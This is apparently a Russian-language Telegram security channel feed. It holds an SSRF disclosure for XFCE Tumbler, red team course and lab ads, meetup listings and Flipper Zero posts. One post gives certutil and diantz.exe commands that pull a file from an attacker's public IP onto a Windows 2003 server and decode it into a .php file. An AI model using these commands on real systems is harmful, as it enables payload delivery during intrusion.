Devious Methods
194 subscribers
153 photos
14 videos
65 files
535 links
Underground music / Cyberpunk stories
Download Telegram
Devious Methods pinned an audio file
Обнаружил SSRF-уязвимость в плагине Tumbler для XFCE, которая работает по умолчанию. Если кратко, суть в том, что при открытии директории с m3u8-файлом с расширением .mp4 (работает и для .mp3, .avi, .mpg, etc.) можно отправлять любой GET-запрос на любой сервер.

Работает в последней версии Kali Linux, Debian XFCE, и скорее всего в любом другом дистрибутиве Linux с XFCE на борту. Но большую опасность, наверное, несет для Kali Linux, пользователи которого локально тестируют уязвимые приложения типа DVWA, и одного запроса может хватить для компрометации компьютера.

Патч и исправленная версия уже выпущены.

Подробности на моем блоге:
https://murat.one/?p=187

#ssrf #xfce #kali #debian
👍3
Новый курс Red Team Operator II продолжение #CRTO от Zeropointsecurity предлагает окунуться с головой в продвинутые тактики OPSEC:

- C2 Infrastructure
- Windows APIs
- Proccess Injection
- Defense Evasion
- Attack Surface Reduction
- Windows Defender Application Control
- EDR Evasion


https://training.zeropointsecurity.co.uk/courses/red-team-ops-ii
👍2
Распродажа курсов от TheCyberMentor TCM Academy!

Сегодня последний день чтобы успеть купить курс по анализу малвари за 1$. Лично я прикупил! 😉

Expires 1am EDT on 8/22:
Code ILOVEMYVIEWERS - $6
Web Application Security & Penetration Testing (
https://academy.tcm-sec.com/p/practical-web-application-security-and-testing)


Expires 11:59pm EDT on 8/22:
Code DOLLARANDADREAM - $1
Practical Malware Analysis & Triage - (
https://academy.tcm-sec.com/p/practical-malware-analysis-triage)
Practical Ethical Hacking - (
https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)
Linux101 - (
https://academy.tcm-sec.com/p/linux-101)

Code WICYS - $6
Mobile Application Penetration Testing (
https://academy.tcm-sec.com/p/mobile-application-penetration-testing) - $1 from each sale of this course goes to Women in CyberSecurity (WiCyS)

Expires 11:59pm EDT on 8/28:
Code OK_FINE_I_WILL_TOO - $1

Movement, Pivoting, & Persistence (
https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers)
👍5
Forwarded from YAH (Egor Bogomolov)
Онлайн митап!

Сегодня стартовал первый митап The Standoff Talks, на котором собрались энтузиасты и профессионалы offensive и defensive security.

Программа на сегодня такая:

12:10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff

13:20 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
14:15 Константин Полишин — RedTeam страдания SOC'а

16:10 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
16:55 Вадим Шелест и Михаил Дрягунов — Breaking Red
18:20 Илья Шапошников — MSSQL: dump linked passwords
19:10 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco

Смотреть прямую трансляцию
#windows2003 #redteam #transferfiles #T1105
Если вы вдруг оказались на старом пыльном Windows 2003ем сервере и нужно доставить туда файлы, есть способы:

certutil -urlcache -split -f URL file
- работать не будет из за версии приложения

Bitsadmin и powershell тут тоже нет.

Есть вариант использовать встроенную утилиту diantz.exe

diantz.exe \\YOURPUBLICIP\file.exe c:\destinationFolder\target.cab


Далее нам нужно распаковать полученный файл

expand target.cab agent.exe


Утилита certutil может пригодиться для encode/decode:

certutil -decode target.cab target.php
👍4
Пойми, на небесах все только и говорят, что о flipper zero
4
Forwarded from Zhovner Hub
Топовый обзор Флиппера на Итальянском. Я почти ни слова не пониманию. Чувак вскрыл сейф, сбрутил ворота CAME и вообще выжимает максимум из устройства

https://www.youtube.com/watch?v=YeGAqnU9zeE
Devious Methods pinned «Пойми, на небесах все только и говорят, что о flipper zero»
Ребята из portswigger открыли новую секцию с лабами на тему JWT атак.

Если кто то хочет быстро залететь в web security рекомендую не тратить время и деньги на сторонние курсы и остановиться на их бесплатной Web Academy.

https://portswigger.net/web-security/jwt
🔥4👍2
Ресайз ваших изображений без СМС и регистрации

https://github.com/upscayl/upscayl

Результат: https://transfer.sh/P9gEID/av41os4M7c2Gneb1kkRUyTqdJJi_upscayled_4x.jpg

Размер оригинального файла: 427К
Размер полученного файла: 12М
👍1
Forwarded from Positive Events
23 августа мы провели первый митап The Standoff Talks. Очень рады были всех увидеть и пообщаться!

В программе было 8 докладов. Если вы слушали хотя бы один из них и ещё не оставляли обратную связь, расскажите, как вам → ✍️ forms.gle/EWjxKUzcMXL8hgte8

В формочке можно оставить отзыв для каждого спикера, мы передадим фидбэк лично. Также есть раздел по организационным вопросам: время, локация, еда и т.д. Ну и место для пожеланий — оставляйте там любые смелые идеи, возьмём на вооружение :)

💼 Записи докладов выложили на ютуб, все презентации спикеров ↓

🔹 Виктор Зварыкин — Не делайте так, как мы
🔹 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
🔹 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
🔹 Константин Полишин — RedTeam страдания SOC'а
🔹 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
🔹 Вадим Шелест и Михаил Дрягунов — Breaking Red
🔹 Илья Шапошников — MSSQL: dump linked passwords
🔹 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco

До встречи на следующем митапе!
В TryHackMe появился модуль Host Evasions!

This module provides the essential knowledge and fundamental techniques to bypass various host-based security solutions, including AV products, UAC and AppLocker, Logging, Runtime Detection, and AMSI. You will also learn the Living-Off-the-Land technique and how to leverage the Windows Sysinternals tool to perform various Red Team purposes

https://tryhackme.com/module/host-evasions
👍2
Forwarded from Zhovner Hub
Пейпал заблокировал $1.3M наших денег

Мы подключили возможность оплаты с помощью PayPal в нашем магазине. Через месяц пейпал заблочил все деньги без возможности вывода, а это почти полтора миллиона долларов.

Нам нужно оплачивать новую партию производства Flipper Zero и эти деньги очень критичны сейчас.

Если вы можете как-то повлиять на ситуацию или у вас есть контакты в PayPal, помогите пожауйлста.

Ответы на этот твит тоже помогут (тут вся инфа подробно):
https://twitter.com/flipper_zero/status/1567194641610465281
💩2